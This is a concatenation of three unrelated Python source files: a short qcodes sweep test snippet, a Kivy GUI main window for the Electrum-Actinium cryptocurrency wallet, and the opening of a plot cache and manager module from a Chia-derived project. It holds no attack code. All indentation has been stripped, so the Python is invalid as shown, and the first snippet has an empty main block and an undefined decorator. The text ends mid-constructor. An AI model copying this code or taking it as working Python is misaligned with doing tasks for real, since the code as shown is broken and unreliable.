#%%
if __name__ == '__main__':
from core_tools.sweeps.sweeps import do1D, do2D
import os
import qcodes as qc
from qcodes.dataset.sqlite.database import initialise_or_create_database_at
from qcodes.dataset.experiment_container import load_or_create_experiment
from qcodes.instrument.specialized_parameters import ElapsedTimeParameter
@job_wrapper
def test():
print('blah')
test()
# class MyCounter(qc.Parameter):
# def __init__(self, name):
# # only name is required
# super().__init__(name, label='Times this has been read',
# docstring='counts how many times get has been called '
# 'but can be reset to any integer >= 0 by set')
# self._count = 0
# # you must provide a get method, a set method, or both.
# def get_raw(self):
# self._count += 1
# return self._count
# def set_raw(self, val):
# self._count = val
# tutorial_db_path = os.path.join(os.getcwd(), 'linking_datasets_tutorial.db')
# initialise_or_create_database_at(tutorial_db_path)
# load_or_create_experiment('tutorial', 'no sample')
# my_param = MyCounter('test_instr')
# x = qc.Parameter(name='x', label='Voltage_x', unit='V',
# set_cmd=None, get_cmd=None)
# y = qc.Parameter(name='y', label='Voltage_y', unit='V',
# set_cmd=None, get_cmd=None)
# timer = ElapsedTimeParameter('time')
# scan1 = do2D(x, 0, 20, 20, 0.0, y, 0, 80, 30, 0.1, my_param)
# scan2 = do2D(x, 0, 20, 20, 0.0, timer, 0, 80, 30, .1, my_param)
# scan3 = do1D(x, 0, 100, 50, 0.1 , my_param, reset_param=True)
# q = queue_mgr()
# job1 = ExperimentJob(1, scan1)
# job2 = ExperimentJob(1, scan2)
# job3 = ExperimentJob(1, scan3)
# q.put(job1)
# q.put(job2)
# q.put(job3)
# q.killall()
# scan1 = do2D(x, 0, 20, 20, 0.0, y, 0, 80, 30, 0.1, my_param)
# scan2 = do2D(x, 0, 20, 20, 0.0, timer, 0, 80, 30, .1, my_param)
# job1 = ExperimentJob(1, scan1)
# job2 = ExperimentJob(1, scan2)
# q.put(job1)
# q.put(job2)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum_acm as electrum
from electrum_acm.bitcoin import TYPE_ADDRESS
from electrum_acm import WalletStorage, Wallet
from electrum_acm_gui.kivy.i18n import _
from electrum_acm.paymentrequest import InvoiceStore
from electrum_acm.util import profiler, InvalidPassword
from electrum_acm.plugins import run_hook
from electrum_acm.util import format_satoshis, format_satoshis_plain
from electrum_acm.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_acm_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_acm_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_acm_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_acm_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_acm_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_acm_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_acm.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_acm.bitcoin import NetworkConstants
pp = servers.get(host, NetworkConstants.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'actinium':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'ACM')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Electrum-Actinium App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_acm.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('actinium:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_acm.transaction import Transaction
from electrum_acm.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_acm.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum_acm.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_acm_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_acm_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_acm_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_acm_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum-actinium.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum-Actinium', message,
app_icon=icon, app_name='Electrum-Actinium')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
manager.py
|
from dataclasses import dataclass
import logging
import threading
import time
import traceback
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple, Iterator
from concurrent.futures.thread import ThreadPoolExecutor
from blspy import G1Element
from chiapos import DiskProver
from cactus.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from cactus.plotting.util import (
PlotInfo,
PlotRefreshResult,
PlotsRefreshParameter,
PlotRefreshEvents,
get_plot_filenames,
parse_plot_info,
stream_plot_info_pk,
stream_plot_info_ph,
)
from cactus.util.ints import uint16
from cactus.util.path import mkdir
from cactus.util.streamable import Streamable, streamable
from cactus.types.blockchain_format.proof_of_space import ProofOfSpace
from cactus.types.blockchain_format.sized_bytes import bytes32
from cactus.wallet.derive_keys import master_sk_to_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
pool_public_key: Optional[G1Element]
pool_contract_puzzle_hash: Optional[bytes32]
plot_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
version: uint16
data: List[Tuple[bytes32, CacheEntry]]
class Cache:
_changed: bool
_data: Dict[bytes32, CacheEntry]
def __init__(self, path: Path):
self._changed = False
self._data = {}
self._path = path
if not path.parent.exists():
mkdir(path.parent)
def __len__(self):
return len(self._data)
def update(self, plot_id: bytes32, entry: CacheEntry):
self._data[plot_id] = entry
self._changed = True
def remove(self, cache_keys: List[bytes32]):
for key in cache_keys:
if key in self._data:
del self._data[key]
self._changed = True
def save(self):
try:
disk_cache: DiskCache = DiskCache(
CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()]
)
serialized: bytes = bytes(disk_cache)
self._path.write_bytes(serialized)
self._changed = False
log.info(f"Saved {len(serialized)} bytes of cached data")
except Exception as e:
log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")
def load(self):
try:
serialized = self._path.read_bytes()
log.info(f"Loaded {len(serialized)} bytes of cached data")
stored_cache: DiskCache = DiskCache.from_bytes(serialized)
if stored_cache.version != CURRENT_VERSION:
# TODO, Migrate or drop current cache if the version changes.
raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data}
except FileNotFoundError:
log.debug(f"Cache {self._path} not found")
except Exception as e:
log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")
def keys(self):
return self._data.keys()
def items(self):
return self._data.items()
def get(self, plot_id):
return self._data.get(plot_id)
def changed(self):
return self._changed
def path(self):
return self._path
class PlotManager:
plots: Dict[Path, PlotInfo]
plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
plot_filename_paths_lock: threading.Lock
failed_to_open_filenames: Dict[Path, int]
no_key_filenames: Set[Path]
farmer_public_keys: List[G1Element]
pool_public_keys: List[G1Element]
cache: Cache
match_str: Optional[str]
show_memo: bool
open_no_key_filenames: bool
last_refresh_time: float
refresh_parameter: PlotsRefreshParameter
log: Any
_lock: threading.Lock
_refresh_thread: Optional[threading.Thread]
_refreshing_enabled: bool
_refresh_callback: Callable
def __init__(
self,
root_path: Path,
refresh_callback: Callable,
match_str: Optional[str] = None,
show_memo: bool = False,
open_no_key_filenames: bool = False,
refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
):
self.root_path = root_path
self.plots = {}
self.plot_filename_paths = {}
self.plot_filename_paths_lock = threading.Lock()
self.failed_to_open_filenames = {}
self.no_key_filenames = set()
self.farmer_public_keys = []
self.pool_public_keys = []
